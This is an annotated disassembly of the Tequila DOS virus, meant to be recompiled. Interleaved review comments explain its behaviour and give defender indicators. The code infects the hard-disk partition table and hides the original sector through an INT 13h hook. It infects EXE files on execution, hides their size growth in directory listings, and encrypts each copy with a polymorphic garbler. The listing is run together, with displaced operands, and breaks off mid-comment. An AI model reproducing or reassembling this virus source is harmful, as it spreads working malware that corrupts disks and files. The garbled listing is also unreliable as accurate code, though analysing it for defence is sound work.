; NOTE(review): analysis annotations only. The listing is kept exactly as it
; was extracted: many source lines are run together, and the trailing
; ";masm mod. needed" remarks and some operands were displaced (the seven `db`
; keywords ending the first line belong to the quoted strings on the next).
; Contents: image origin 0100 whose entry jumps to `start`, a small data area
; (words at offsets 6 and 8 are used later as date/trigger values), then a
; "$"-terminated text block.
; Defender note: these strings are a simple static indicator wherever the body
; is present unencoded; the copy appended to files is encoded by
; perform_encryption_decryption further down this listing.
;============================= ; the tequila virus = ; a recompilable = ; dis-assembly = ; specifically designed = ; for assembly to a com file = ; with the a86 assembler. = ; ++++++++++++++++++ = ; if you desire a "perfect" = ; byte for byte source code = ;match-up, the masm assembler= ; must be used and the noted = ;instructions must be changed= ; to comply with masm syntax.= ; in addition, all byte and = ;word pointer references must= ; be changed from b and w to = ; byte pointer and word = ; pointer. = ;============================= code_seg segment assume cs:code_seg, ds:code_seg, es:code_seg, ss:code_seg org 0100 tequila proc near jmp start db 000, 000, 000, 000, 000, 000, 000, 0ffh, 0ffh db 009, 005, 001h, 010h, 000, 000, 002h, 0fah, 000, 00ch db db db db db db db
00dh, 00ah, 00dh, 00ah "welcome to t.tequila's latest production.", 00dh, 00ah "contact t.tequila/p.o.box 543/6312 st'hausen/" "switzerland.", 00dh, 00ah "loving thoughts to l.i.n.d.a", 00dh, 00ah, 00dh, 00ah "beer and tequila forever !", 00dh, 00ah, 00dh, 00ah "$"
; One more text string (45 bytes, not "$"-terminated), then
; program_termination_routine (first part; it continues on a later line).
; The routine is called from the INT 21h hook when AH=4Ch (see set_stack).
; It saves all registers, sets DS=CS and examines w[6]/w[8], which
; infect_partition_table fills with CX/DX of the DOS date call (AH=2Ah).
; Depending on those values it either leaves (apparently via 0243h) or
; re-reads the date and compares it with the stored one.
; Display path: INT 11h equipment bits 4-5 select text segment 0B800h or
; 0B000h, then a fixed-point loop (imul/idiv, 01Eh passes, bound test
; `cmp dx,0f`) computes each cell; presumably an escape-time iteration for a
; Mandelbrot-style figure - TODO confirm.
; NOTE(review): jump targets are absolute offsets (0243h, 020dh, ...), so the
; control flow can only be followed against the original byte layout.
db "execute: mov ax, fe03 / int 21. key to go on!" program_termination_routine: push bp mov bp,sp sub sp,0ch push ax push bx push cx push dx push si push di push es push ds push cs pop ds mov ax,w[6]
inc ax je 0243h dec ax jne 020dh dec w[8] jne 0243h jmp 0246h mov ah,02ah call int_21 mov si,cx mov cx,w[8] cmp cl,dl jne 022fh mov ax,si sub ax,w[6] mul b[011h] add al,dh add ch,3 cmp al,ch jae 0237h mov w[6],0ffffh jmp 0243h mov w[6],0 mov w[8],3 jmp 02df mov bx,0b800h int 011 and ax,030h cmp ax,030h jne 0256h mov bx,0b000h mov es,bx xor bx,bx mov di,0fd8fh mov si,0fc18h mov w[bp-2],si mov w[bp-4],di mov cx,01e mov ax,w[bp-2] imul ax mov w[bp-8],ax mov w[bp-6],dx mov ax,w[bp-4] imul ax mov w[bp-0c],ax mov w[bp-0a],dx add ax,w[bp-8] adc dx,w[bp-6] cmp dx,0f jae 02b0 mov ax,w[bp-2] imul w[bp-4] idiv w[0f] add ax,di mov w[bp-4],ax mov ax,w[bp-8] mov dx,w[bp-6] sub ax,w[bp-0c]
;masm mod. needed ;masm ;masm ;masm ;masm
mod. mod. mod. mod.
needed needed needed needed
;masm mod. needed ;masm mod. needed
;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
;masm mod. needed
;masm mod. needed ;masm mod. needed
; Tail of program_termination_routine: each cell is stored through ES as a
; word (CL=0DBh character, CH derived from the remaining loop count), SI/DI
; step across the grid, then 02Dh bytes from offset 0BBh are copied to every
; other byte starting at ES:0 (movsb followed by inc di). INT 16h AH=0 waits
; for a key before the registers are restored.
; print_message: DS=CS, DOS function 09h on the "$"-terminated text at offset
; 012h, issued through the int_21 helper (saved vector, not the live one).
; new_partition_table (start): replacement boot code; interrupts off,
; DS=SS=0, SP=07C00. Continues on a later line.
sbb dx,w[bp-0a] idiv w[0d] add ax,si mov w[bp-2],ax loop 0269 inc cx shr cl,1 mov ch,cl mov cl,0db es mov w[bx],cx inc bx inc bx add si,012 cmp si,01b8 jl 0260 ;masm add di,034 cmp di,02a3 jl 025d ;masm xor di,di mov si,0bb mov cx,02d cld movsb inc di loop 02d7 xor ax,ax int 016 pop ds pop es pop di pop si pop dx pop cx pop bx pop ax mov sp,bp pop bp ret print_message: push dx push ds push cs pop ds mov ah,9 mov dx,012 call int_21 pop ds pop dx ret new_partition_table: cli xor bx,bx mov ds,bx mov ss,bx mov sp,07c00 sti
;masm mod. needed ;masm mod. needed
;masm mod. needed
mod. needed mod. needed
;masm mod. needed
; new_partition_table (continued): subtracts 3 from the word at 0:0413h (BIOS
; base-memory size in KB), reads the new size with INT 12h and shifts it left
; by 6 to get a segment. It then reads 5 sectors (AX=0205h) to offset 0 of
; that segment, starting one sector after the CX value stored at 07C30h (DX
; from 07C32h), and far-returns to offset 022Ah of the loaded copy.
; Defender note: a BIOS base-memory figure 3 KB below the installed amount is
; the visible side effect of this step.
xor di,di sub w[0413],3 int 012 mov cl,6 shl ax,cl mov es,ax push es mov ax,022a push ax mov ax,0205 mov cx,w[07c30] inc cx mov dx,w[07c32] int 013 retf
;masm mod. needed
; Three data words close the boot stub. infect_partition_table copies 034h
; bytes from 01F6h, so they sit at stub offsets 02Eh/030h/032h: the word
; 0FE02h that is tested at sector offset 02Eh, then the CX and DX values
; addressed elsewhere as w[0226]/w[0228].
; The code after them is what the stub far-returns into (022Ah). It reads one
; sector (AX=0201h) from w[0226]/w[0228] to 0:07C00 and leaves that address on
; the stack for the final retf, so the saved original sector is what runs.
; Before that it copies two fragments (046h bytes 0409h->09BEh, 045h bytes
; 091Bh->0A04h), saves the vectors at 0:0070h (INT 1Ch) and 0:0084h (INT 21h)
; into 09B0h and 09B4h, and points INT 1Ch at CS:044Fh.
db 002, 0fe db 04c, 0e9 db 080, 004 push cs pop ds xor ax,ax mov es,ax mov bx,07c00 push es push bx mov ax,0201 mov cx,w[0226] mov dx,w[0228] int 013 push cs pop es cld mov si,0409 mov di,09be mov cx,046 rep movsb mov si,091b mov di,0a04 mov cx,045 rep movsb cli xor ax,ax mov es,ax es les bx,[070] mov w[09b0],bx mov w[09b2],es mov es,ax es les bx,[084] mov w[09b4],bx mov w[09b6],es mov es,ax es mov w[070],044f es mov w[072],ds sti retf
;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
; install: call/pop yields the load offset in SI; the words at [si+2] and
; [si+4] are relocated by the current ES (presumably the saved host CS and SS
; - confirm against encrypt_and_write_to_file, which stores w[2]/w[4]).
; Residency probe: INT 21h with AX=0FE02h. A resident copy answers AX=01FDh
; (its handler executes `not ax`) and nothing further is installed.
; Otherwise the block header at segment ES-1 is checked (byte 05Ah at offset
; 0, word at offset 3 above 0BBh), 09A4h bytes are copied to the segment 0BBh
; paragraphs below the word at offset 012h, and infect_partition_table runs
; from that copy. Control then goes to the host via the far pointer at cs:[si].
;
; infect_partition_table (part 1): stores the DOS date in w[6]/w[8], saves the
; INT 13h vector at 09A0h, points INT 1 at 03DAh and sets the trap flag while
; reading sector 1 of drive 80h into 09A4h through that pointer; the INT 1
; handler (new_interrupt_one) can overwrite 09A0h during the call. INT 1 is
; restored afterwards. The sector is left alone if the word at offset 02Eh is
; already 0FE02h. Otherwise the four 16-byte entries at 01BEh are searched
; for type byte 1, 4 or 6, and the routine returns unless the low six bits of
; the entry's word at +6 exceed 6.
; Defender note: the AX=0FE02h -> 01FDh answer and the 0FE02h word at sector
; offset 02Eh are the two self-recognition markers visible here.
install: call next_line next_line: pop si sub si,028f push si push ax push es push cs pop ds mov ax,es add w[si+2],ax add w[si+4],ax dec ax mov es,ax mov ax,0fe02 int 021 cmp ax,01fd je no_partition_infection es cmp b[0],05a ;masm mod. needed jne no_partition_infection es cmp w[3],0bb ;masm mod. needed jbe no_partition_infection es mov ax,w[012] ;masm mod. needed sub ax,0bb mov es,ax xor di,di mov cx,09a4 cld rep movsb push es pop ds call infect_partition_table no_partition_infection: pop es pop ax push es pop ds pop si cs mov ss,w[si+4] ;masm mod. needed chain_to_the_host_file: cs jmp d[si] ;masm mod. needed infect_partition_table: mov ah,02a int 021 mov w[6],cx ;masm mod. needed mov w[8],dx ;masm mod. needed mov ah,052 int 021 es mov ax,w[bx-2] ;masm mod. needed mov w[03e8],ax ;masm mod. needed mov ax,03513 int 021 mov w[09a0],bx ;masm mod. needed mov w[09a2],es ;masm mod. needed mov ax,03501 int 021
mov si,bx mov di,es mov ax,02501 mov dx,03da int 021 mov b[0a],0 pushf pop ax or ax,0100 push ax popf mov ax,0201 mov bx,09a4 mov cx,1 mov dx,080 push ds pop es pushf call d[09a0] pushf pop ax and ax,0feff push ax popf pushf mov ax,02501 mov dx,si mov ds,di int 021 popf jae 0450 jmp ret ;masm push es pop ds cmp w[bx+02e],0fe02 jne 045c jmp ret ;masm add bx,01be mov cx,4 mov al,b[bx+4] cmp al,4 je 0479 ;masm cmp al,6 je 0479 ;masm cmp al,1 je 0479 ;masm add bx,010 loop 0463 jmp short ret mov dl,080 mov dh,b[bx+5] mov w[0228],dx mov ax,w[bx+6] mov cx,ax mov si,6 and ax,03f cmp ax,si jbe ret ;masm
;masm mod. needed
;masm mod. needed
;masm mod. needed mod. needed
;masm mod. needed mod. needed
mod. needed mod. needed mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
mod. needed
; infect_partition_table (part 2); every disk call goes through the far
; pointer at 09A0h, and a carry from any write ends the routine.
; 1. CX = entry's end sector/cylinder word minus 6, plus 1; remembered in
;    w[0226]. The buffered original sector is written there (AX=0301h).
; 2. The table entry is shrunk: word at +6 set to the reduced value, 32-bit
;    count at +0Ch/+0Eh reduced by 6.
; 3. Five sectors from offset 0 are written (AX=0305h) to the following sector.
; 4. 034h bytes from 01F6h are copied over the start of the buffered sector,
;    which is written back to sector 1 with DH=0 (DL still 080 from above).
; Defender note: the partition entry ends six sectors early and the reclaimed
; sectors hold the saved original sector plus the body - TODO confirm the
; exact placement on a sample image.
sub cx,si mov di,bx inc cx mov w[0226],cx mov ax,0301 mov bx,09a4 pushf call d[09a0] jb ret ;masm dec cx mov w[di+6],cx inc cx sub w[di+0c],si sbb w[di+0e],0 mov ax,0305 mov bx,0 inc cx pushf call d[09a0] jb ret ;masm mov si,01f6 mov di,09a4 mov cx,034 cld rep movsb mov ax,0301 mov bx,09a4 mov cx,1 xor dh,dh pushf call d[09a0] ret
;masm mod. needed
;masm mod. needed mod. needed
;masm mod. needed mod. needed
;masm mod. needed
; new_interrupt_one: INT 1 (single-step) handler, active only during the
; traced disk read in infect_partition_table. It tests the flag b[0Ah] and
; the interrupted code segment at [bp+4] against 09B4h (the branch targets
; 0506h/050Bh are absolute, so which exit each takes must be confirmed against
; the original layout). On the remaining path it stores the interrupted
; CS:IP from [bp+2] into 09A0h/09A2h, sets the flag and clears the trap bit
; (0100h) in the stacked flags.
; new_interrupt_13 (start): requests with CX=1, DX=080 and AH=2 or 3 are
; examined further; the rest branch to 054Eh (presumably the pass-through
; jump at the end of the handler - confirm).
new_interrupt_one: push bp mov bp,sp cs cmp b[0a],1 ;masm mod. needed je 0506 ;masm mod. needed cmp w[bp+4],09b4 ja 050b ;masm mod. needed push ax push es les ax,[bp+2] cs mov w[09a0],ax ;masm mod. needed cs mov w[09a2],es ;masm mod. needed cs mov b[0a],1 pop es pop ax and w[bp+6],0feff pop bp iret new_interrupt_13: cmp cx,1 jne 054e cmp dx,080 jne 054e cmp ah,3
;masm mod. needed ;masm mod. needed
; new_interrupt_13 (continued): for the selected read/write of sector 1 on
; drive 80h, any sectors beyond the first are passed on starting at sector 2
; with the buffer advanced by 0200h, and the first sector is served from the
; location in w[0226]/w[0228], i.e. where the original sector was saved.
; Defender note: while this hook is active a read of that sector through
; INT 13h returns the saved original, so inspect it from clean boot media.
;
; new_timer_tick_interrupt: INT 1Ch hook set at boot. It polls the INT 21h
; vector at 0:0084h; once its segment is not above 0800h and it differs from
; the copy in 09B4h/09B6h, the new value is recorded, INT 1Ch is restored from
; 09B0h, the INT 13h vector (0:004Ch) is saved to 09A0h, and INT 13h / INT 21h
; are pointed at CS:09BEh / CS:04B1h.
;
; int_21_intercept dispatch:
;   AH=11h/12h, 4Eh/4Fh -> directory-size adjustment helpers
;   AX=0FE02h           -> returns NOT AX (residency answer)
;   AX=0FE03h           -> print_message, only when w[6] is 0
;   AX=4B00h            -> infect_the_file
;   AH=4Ch              -> program_termination_routine
; The last two run on a private stack at CS:0AE5h with SS:SP saved in
; 09A8h/09A6h. Everything not answered directly chains to the saved vector at
; 09B4h after incrementing the counter at 09BCh.
ja 054e ;masm mod. needed cmp ah,2 jb 054e ;masm mod. needed push cx push dx dec al je 0537 ;masm mod. needed push ax push bx add bx,0200 inc cx pushf cs call d[09a0] ;masm mod. needed pop bx pop ax mov al,1 cs mov cx,w[0226] ;masm mod. needed cs mov dx,w[0228] ;masm mod. needed pushf cs call d[09a0] ;masm mod. needed pop dx pop cx retf 2 cs jmp d[09a0] ;masm mod. needed new_timer_tick_interrupt: push ax push bx push es push ds xor ax,ax mov es,ax push cs pop ds es les bx,[084] ;masm mod. needed mov ax,es cmp ax,0800 ja 05b0 ;masm mod. needed cmp ax,w[09b6] jne 0575 ;masm mod. needed cmp bx,w[09b4] je 05b0 ;masm mod. needed mov w[09b4],bx ;masm mod. needed mov w[09b6],es ;masm mod. needed xor ax,ax mov ds,ax cs les bx,[09b0] ;masm mod. needed mov w[070],bx ;masm mod. needed mov w[072],es ;masm mod. needed les bx,[04c] ;masm mod. needed cs mov w[09a0],bx ;masm mod. needed cs mov w[09a2],es ;masm mod. needed mov w[04c],09be ;masm mod. needed mov w[04e],cs ;masm mod. needed mov w[084],04b1 ;masm mod. needed mov w[086],cs ;masm mod. needed pop ds pop es
pop bx pop ax iret int_21_intercept: cmp ah,011 jb check_for_handle cmp ah,012 ja check_for_handle call adjust_fcb_matches retf 2 check_for_handle: cmp ah,04e jb check_for_previous_installation cmp ah,04f ja check_for_previous_installation call adjust_handle_matches retf 2 check_for_previous_installation: cmp ax,0fe02 jne check_for_message_print not ax iret check_for_message_print: cmp ax,0fe03 jne check_for_execute cs cmp w[6],0 ;masm mod. needed jne chain_to_true_int_21 call print_message iret check_for_execute: cmp ax,04b00 je set_stack cmp ah,04c jne chain_to_true_int_21 set_stack: cs mov w[09a6],sp ;masm mod. needed cs mov w[09a8],ss ;masm mod. needed cli push cs pop ss mov sp,0ae5 sti cmp ah,04c jne to_an_infection call program_termination_routine jmp short no_infection to_an_infection: call infect_the_file no_infection: cli cs mov ss,w[09a8] ;masm mod. needed cs mov sp,w[09a6] ;masm mod. needed sti jmp short chain_to_true_int_21 chain_to_true_int_21: cs inc w[09bc] ;masm mod. needed cs jmp d[09b4] ;masm mod. needed
; new_critical_error_handler: INT 24h replacement installed by
; infect_the_file; returns AL=3.
; adjust_fcb_matches / adjust_handle_matches: fetch the DTA address (AH=2Fh),
; run the caller's search through the saved vector at 09B4h, then inspect the
; returned entry (the FCB variant skips 7 bytes when the entry starts with
; 0FFh). If the low five bits of the time field are all set (01Fh), 09A4h is
; subtracted from the 32-bit size field. Caller's AX and flags are preserved.
; Defender note: 09A4h is 2468 bytes. Directory listings taken while the hook
; is resident under-report marked files by that amount; compare against a
; listing from clean boot media, and treat a time stamp whose seconds field is
; 01Fh as the file-side marker.
; write_to_the_file: loads AH=40h and jumps to 069Ch (absolute; presumably
; inside the shared INT 21h helper - confirm).
new_critical_error_handler: mov al,3 iret adjust_fcb_matches: push bx push es push ax mov ah,02f call int_21 pop ax pushf cs call d[09b4] ;masm mod. needed pushf push ax cmp al,0ff je 0664 ;masm mod. needed es cmp b[bx],0ff ;masm mod. needed jne 064f ;masm mod. needed add bx,7 es mov al,b[bx+017] ;masm mod. needed and al,01f cmp al,01f jne 0664 ;masm mod. needed es sub w[bx+01d],09a4 ;masm mod. needed es sbb w[bx+01f],0 ;masm mod. needed pop ax popf pop es pop bx ret adjust_handle_matches: push bx push es push ax mov ah,02f call int_21 pop ax pushf cs call d[09b4] ;masm mod. needed pushf push ax jb 0691 ;masm mod. needed es mov al,b[bx+016] ;masm mod. needed and al,01f cmp al,01f jne 0691 ;masm mod. needed es sub w[bx+01a],09a4 ;masm mod. needed es sbb w[bx+01c],0 ;masm mod. needed pop ax popf pop es pop bx ret write_to_the_file:
mov ah,040 jmp 069c
;masm mod. needed
; read_from_the_file: AH=3Fh through the helper at 06B4h; on success returns
; AX minus CX (zero when the full count was transferred), carry on error.
; move_to_end_of_file: seek with AX=04202 and CX:DX = 0, then jumps to the
; same helper at 06B4h (absolute target).
read_from_the_file: mov ah,03f call 06b4 ;masm mod. needed jb ret ;masm mod. needed sub ax,cx ret move_to_end_of_file: xor cx,cx xor dx,dx mov ax,04202 jmp 06b4
;masm mod. needed
; move_to_beginning_of_file: seek with AX=04200 and CX:DX = 0, then falls
; through: BX is loaded with the file handle kept at cs:w[09A4h].
; int_21: issues the request through the saved INT 21h vector at 09B4h
; (pushf + far call) rather than the live vector, so the virus's own hook and
; anything installed after it are not involved. Interrupts are disabled
; (cli) before the call.
move_to_beginning_of_file: xor cx,cx xor dx,dx mov ax,04200 cs mov bx,w[09a4] int_21: cli pushf cs call d[09b4] ret
;masm mod. needed
;masm mod. needed
; infect_the_file (part 1). Entered from the INT 21h hook on AX=4B00h with the
; caller's DS:DX still pointing at the program name.
; - check_letters_in_filename: carry set -> leave via bad_name.
; - INT 24h vector saved in 09B8h/09BAh and replaced by CS:052Ah.
; - Attributes saved in 09AAh and cleared (AX=04301, CX=0); file opened
;   read/write (AX=03D02); handle kept in 09A4h.
; - File date/time saved in 09ACh/09AEh.
; - 01Ch header bytes read to 0A49h; only a header starting with 05A4Dh
;   continues.
; - The header word at 0A5Bh (header offset 12h) is looked up in the 020h-word
;   table at 0E8h. A hit is treated as already handled: only the time marker
;   (low five bits set) is applied. Otherwise read_past_end_of_file and
;   encrypt_and_write_to_file run.
; - The date/time is written back (AX=05701) and the handle close begins; the
;   close call itself is on a later line.
; Defender note: the original date is restored, so only the seconds field
; (01Fh) and the size change distinguish a modified file by metadata.
infect_the_file: push ax push bx push cx push dx push si push di push es push ds call check_letters_in_filename jae good_name jmp bad_name good_name: push dx push ds push cs pop ds save_and_replace_critical_error_handler: mov ax,03524 call int_21 mov w[09b8],bx ;masm mod. needed mov w[09ba],es ;masm mod. needed mov ax,02524 mov dx,052a call int_21 pop ds pop dx
save_and_replace_file_attribute: mov ax,04300 call int_21 cs mov w[09aa],cx ;masm mod. needed jae 06fe ;masm mod. needed jmp restore_crit_handler mov ax,04301 xor cx,cx call int_21 jb 077c ;masm mod. needed open_file_for_read_write: mov ax,03d02 call int_21 jb 0771 ;masm mod. needed push dx push ds push cs pop ds mov w[09a4],ax ;masm mod. needed get_filedate: mov ax,05700 call 06b4 ;masm mod. needed jb 075c ;masm mod. needed mov w[09ac],dx ;masm mod. needed mov w[09ae],cx ;masm mod. needed read_and_check_exe_header: call 06ad ;masm mod. needed mov dx,0a49 mov cx,01c call 069a ;masm mod. needed jb 075c ;masm mod. needed push ds pop es mov di,0e8 mov cx,020 cmp w[0a49],05a4d ;masm mod. needed jne 075c ;masm mod. needed mov ax,w[0a5b] cld repne scasw jne 0754 ;masm mod. needed or w[09ae],01f ;masm mod. needed jmp 075c ;masm mod. needed call read_past_end_of_file jb 075c ;masm mod. needed call encrypt_and_write_to_file restore_altered_date: mov ax,05701 mov dx,w[09ac] mov cx,w[09ae] call 06b4 close_the_file: mov ah,03e
;masm mod. needed
; Tail of infect_the_file: completes the close (AH=3Eh was loaded on the
; previous code line), restores the saved attributes (AX=04301, CX from
; 09AAh) and puts back the INT 24h vector saved at 09B8h (AX=02524).
call 06b4 restore_file_attribute: pop ds pop dx mov ax,04301 cs mov cx,w[09aa] call int_21 restore_crit_handler: mov ax,02524 cs lds dx,[09b8] call int_21
;masm mod. needed
;masm mod. needed
;masm mod. needed
; bad_name: common exit of infect_the_file; restores the eight saved registers.
; check_letters_in_filename: measures the zero-terminated name at DS:DX, then
; scans it for the word 04353h (bytes 53h,43h = "SC") at any position and for
; the byte 056h ("V"). The branch targets are absolute; per the clc/stc pair
; at the end, a hit presumably returns carry set (name rejected) - confirm.
; NOTE(review): only those exact byte values are compared; no case folding is
; visible here.
; read_past_end_of_file: seeks to 0Ah bytes before the end, reads 8 bytes to
; 0A65h and compares the first two words with 0FDF0h and 0AAC5h. On a match it
; seeks to 9 bytes before the end and writes 4 bytes from 0A6Bh; presumably
; this deals with a trailer appended by another tool - TODO confirm.
bad_name: pop ds pop es pop di pop si pop dx pop cx pop bx pop ax ret check_letters_in_filename: push ds pop es mov di,dx mov cx,-1 xor al,al cld repne scasb not cx mov di,dx mov ax,04353 mov si,cx scasw je 07b7 ;masm mod. needed dec di loop 07a5 ;masm mod. needed mov cx,si mov di,dx mov al,056 repne scasb je 07b7 ;masm mod. needed clc ret stc ret read_past_end_of_file: mov cx,-1 mov dx,-0a call 06a8 ;masm mod. needed mov dx,0a65 mov cx,8 call 069a ;masm mod. needed
jb ret ;masm cmp w[0a65],0fdf0 jne 07f0 cmp w[0a67],0aac5 jne 07f0 mov cx,-1 mov dx,-9 call 06a8 mov dx,0a6b mov cx,4 call 0696 ret clc ret
mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed ;masm mod. needed
; encrypt_and_write_to_file: works on the header copy at 0A49h (BX).
; - File length from the end-seek is compared with header word +4 times
;   w[0Dh]; the routine leaves when the file is longer than the header says.
; - Header word +8 times w[0Bh] is subtracted to get the image length; a
;   further check involves the header's +0Eh/+10h fields against that length.
; - Saved for the return to the host: w[0] = header +14h, w[2] = header +16h
;   plus 10h, w[4] = header +0Eh plus 10h. Header +0Eh is raised by 09Bh.
; - Length plus 09A4h is divided by w[0Dh] to refill header words +4 and +2
;   (0A4Dh, 0A4Bh); image length divided by w[0Bh] gives the new +16h
;   (0A5Fh) and, with 0960h added to the remainder, the new +14h (0A5Dh).
; - copy_to_high_memory_encrypt_write appends the body; on success the time
;   marker is set, header word +12h (0A5Bh) is taken from the table at 0E8h
;   indexed by the low five bits of the counter at 09BCh, and the 01Ch-byte
;   header is rewritten at the start of the file.
; NOTE(review): w[0Bh]/w[0Dh] are data words from the top of the image; their
; values (presumably paragraph and page size) are not stated here.
; Defender note: header +12h always comes from a fixed 32-entry table and the
; entry point lands 0960h bytes into the appended 09A4h-byte block.
encrypt_and_write_to_file: call move_to_end_of_file mov si,ax mov di,dx mov bx,0a49 mov ax,w[bx+4] mul w[0d] ;masm mod. needed sub ax,si sbb dx,di jae 080c ;masm mod. needed jmp out_of_encrypt mov ax,w[bx+8] mul w[0b] ;masm mod. needed sub si,ax sbb di,dx mov ax,w[bx+0e] mov w[4],ax ;masm mod. needed add w[4],010 ;masm mod. needed mul w[0b] ;masm mod. needed add ax,w[bx+010] sub ax,si sbb dx,di jb 083c ;masm mod. needed sub ax,080 sbb dx,0 jb ret ;masm mod. needed add w[bx+0e],09b mov ax,w[bx+016] add ax,010 mov w[2],ax ;masm mod. needed mov ax,w[bx+014] mov w[0],ax ;masm mod. needed call 06a4 ;masm mod. needed add ax,09a4 adc dx,0 div w[0d] ;masm mod. needed inc ax mov w[0a4d],ax ;masm mod. needed mov w[0a4b],dx ;masm mod. needed mov dx,di mov ax,si div w[0b] ;masm mod. needed mov w[0a5f],ax ;masm mod. needed
mov bx,dx add dx,0960 mov w[0a5d],dx ;masm mod. needed call copy_to_high_memory_encrypt_write jb ret ;masm mod. needed or w[09ae],01f ;masm mod. needed mov bx,w[09bc] and bx,01f shl bx,1 mov ax,w[bx+0e8] mov w[0a5b],ax ;masm mod. needed call move_to_beginning_of_file mov cx,01c mov dx,0a49 write_the_new_header: call 0696 out_of_encrypt: ret
;masm mod. needed
; copy_to_high_memory_encrypt_write: reads the BIOS tick count (INT 1Ah,
; AH=0) and fills the 020h words at 0960h with its low word; BP is set to the
; same value. encrypt_step_one/two/three then write a short stub into that
; same buffer starting at 0960h, an 0E9h jump with a displacement computed
; from 028Ch is appended, and the routine at 0A04h is called (0A04h is where
; the boot-time code copies the fragment from 091Bh).
; ES is 0 throughout, and the helpers test bytes at ES:[BP] with BP counting
; down, so the emitted variant depends on the tick value and low memory.
; encrypt_step_one (start): emits either 0Eh, 01Fh or the two words on the
; next code line, with garbler called after each.
; Defender note: the 040h-byte block at 0960h differs per copy (stub bytes
; plus tick filler), so a fixed byte signature over that block is unreliable.
copy_to_high_memory_encrypt_write: push bp xor ah,ah int 01a mov ax,dx mov bp,dx push ds pop es mov di,0960 mov si,di mov cx,020 cld rep stosw xor dx,dx mov es,dx call encrypt_step_one call encrypt_step_two call encrypt_step_three mov b[si],0e9 mov di,028c sub di,si sub di,3 inc si mov w[si],di mov ax,0a04 call ax pop bp ret encrypt_step_one: dec bp es test b[bp],2 jne 08eb mov b[si],0e inc si call garbler mov b[si],01f inc si
;masm mod. needed ;masm mod. needed
; Rest of encrypt_step_one, then encrypt_step_two and encrypt_step_three.
; All three append bytes at [SI] and call garbler between them.
; - encrypt_step_two: bit 0 of CH records a choice made from ES:[BP]; the
;   step emits 0BEh and 0BBh loads (order depends on that choice) with BX and
;   BX+0960h as operands, then 0B9h with the constant 0960h.
; - encrypt_step_three: emits the loop body; the register encodings follow
;   CH bit 0. b[0A39h] is set to 028h, or to 030h when the tested bit at
;   ES:[BP] is set, and the same value is emitted into the stub;
;   make_the_disk_write later tests b[0A39h]. The step also back-patches an
;   072h short-branch displacement and ends with an 0E2h branch to the start.
; NOTE(review): branch targets are absolute offsets, so the exact pairing of
; the alternative paths must be confirmed against the original layout.
call garbler ret mov w[si],0cb8c inc si inc si call garbler mov w[si],0db8e inc si inc si call garbler ret encrypt_step_two: and ch,0fe dec bp es test b[bp],2 ;masm mod. needed je 0920 ;masm mod. needed or ch,1 mov b[si],0be inc si mov w[si],bx inc si inc si call garbler add bx,0960 test ch,1 je 0934 ;masm mod. needed mov b[si],0bb inc si mov w[si],bx inc si inc si call garbler add bx,0960 test ch,1 je 090c ;masm mod. needed sub bx,0960 call garbler mov b[si],0b9 inc si mov ax,0960 mov w[si],ax inc si inc si call garbler call garbler ret encrypt_step_three: mov ah,014 mov dh,017 test ch,1 je 0958 ;masm mod. needed xchg dh,ah mov di,si mov al,08a mov w[si],ax inc si
inc si call garbler xor dl,dl mov b[0a39],028 ;masm mod. needed dec bp es test b[bp],2 ;masm mod. needed je 0978 ;masm mod. needed mov dl,030 mov b[0a39],dl ;masm mod. needed mov w[si],dx inc si inc si mov w[si],04346 inc si inc si call garbler mov ax,0fe81 mov cl,0be test ch,1 je 0993 ;masm mod. needed mov ah,0fb mov cl,0bb mov w[si],ax inc si inc si push bx add bx,040 mov w[si],bx inc si inc si pop bx mov b[si],072 inc si mov dx,si inc si call garbler mov b[si],cl inc si mov w[si],bx inc si inc si mov ax,si sub ax,dx dec ax mov bx,dx mov b[bx],al call garbler call garbler mov b[si],0e2 inc si sub di,si dec di mov ax,di mov b[si],al inc si call garbler ret
; garbler: optionally appends one filler encoding at [SI]. BP is decremented
; and the byte at ES:[BP] tested: if its low four bits are all clear nothing
; is emitted. Otherwise further bits of following bytes choose among the
; fixed values visible here (word 0C789h, byte 090h, byte 0FCh, or a two-byte
; form built from 084h/085h/039h with the second byte OR-ed with 0C0h).
; Defender note: this is why the stub length and content vary between copies.
garbler: dec bp es test b[bp],0f je ret ;masm dec bp es mov al,b[bp] test al,2 je 0a0e ;masm test al,4 je 09f7 ;masm test al,8 je 09f1 ;masm mov w[si],0c789 inc si inc si jmp ret ;masm mov b[si],090 inc si jmp ret ;masm mov al,085 dec bp es mov ah,b[bp] test ah,2 je 0a05 ;masm dec al or ah,0c0 mov w[si],ax inc si inc si jmp ret ;masm dec bp es test b[bp],2 je 0a1a ;masm mov al,039 jmp 09f9 mov b[si],0fc inc si ret
;masm mod. needed mod. needed ;masm mod. needed mod. needed mod. needed mod. needed
mod. needed mod. needed ;masm mod. needed mod. needed
mod. needed ;masm mod. needed mod. needed ;masm mod. needed
; make_the_disk_write: transforms the body in place, writes 09A4h bytes from
; offset 0 to the handle in w[09A4h] through the saved INT 21h vector
; (AH=40h), then calls perform_encryption_decryption again so the resident
; copy is usable. Returns AX minus CX and the carry from the write. b[0A39h]
; is checked after the write and cleared when it holds 028h.
; perform_encryption_decryption: XORs 0960h bytes starting at offset 0 with
; the bytes at 0960h..099Fh, reusing that 040h-byte block cyclically.
; NOTE(review): the XOR is its own inverse, which is why the same routine is
; called before and after the write.
make_the_disk_write: call perform_encryption_decryption mov ah,040 mov bx,w[09a4] mov dx,0 mov cx,09a4 pushf call d[09b4] ;masm mod. needed jb 0a37 ;masm mod. needed sub ax,cx pushf cmp b[0a39],028 ;masm mod. needed jne 0a44 ;masm mod. needed mov b[0a39],0 ;masm mod. needed call perform_encryption_decryption popf ret perform_encryption_decryption:
mov bx,0 mov si,0960 mov cx,0960 mov dl,b[si] xor b[bx],dl inc si inc bx cmp si,09a0 jb 0a61 mov si,0960 loop 0a52 ret
;masm mod. needed ;masm mod. needed
; the_file_decrypting_routine: DS=CS, then adds the bytes at 0964h..09A3h,
; used cyclically, to 0960h bytes starting at offset 4, and jumps to 0390h.
; NOTE(review): the offsets here are 4 higher than in
; perform_encryption_decryption; the reason (presumably the position of this
; copy in the image) is not visible in the listing.
; Booster (marked by the author as not part of the virus): the operands of
; `lea mov mov sub jmp` were displaced onto the following line by the
